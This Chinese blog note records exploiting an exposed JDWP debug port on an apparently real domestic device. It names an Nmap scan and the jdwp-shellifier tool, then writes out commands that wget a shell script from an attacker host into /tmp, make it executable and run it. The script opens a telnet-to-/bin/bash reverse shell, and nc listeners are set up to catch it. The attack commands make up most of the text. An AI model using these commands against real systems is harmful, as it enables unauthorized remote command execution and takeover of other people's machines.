JDWP系统命令漏洞执行利用实例

JDWP系统命令漏洞执行利用实例

好久没更新博客,一切都因为太忙

偶遇几个JDWP,测试下 漏洞存在所以写个笔记记下

NMAP扫描

image

利用工具: https://github.com/IOActive/jdwp-shellifier

 

image

要触发**.**.**.**.ServerSocket.accept 访问一下web端口就行了

 

此目标的Web端口是8009哦

 

姿势来自

http://www.wooyun.org/bugs/wooyun-2010-095744

增加利用telnet反弹得到shell的方法,以国内某设备为例

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'wget http://x.x.x.x:2222/shell.txt -O /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'chmod a+x /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd '/tmp/shell.sh'

shell.txt内容:(需要开2个端口,一个用于发送命令一个用于接受命令返回)

telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333

 

然后在x.x.x.x服务器上用nc监听1111端口和3333端口

1111端口是发送命令,3333回显命令结果的

两个cmd窗口

image

 

nc -nnv -L -p 3333

nc -nnv -L -p 1111

tag
cat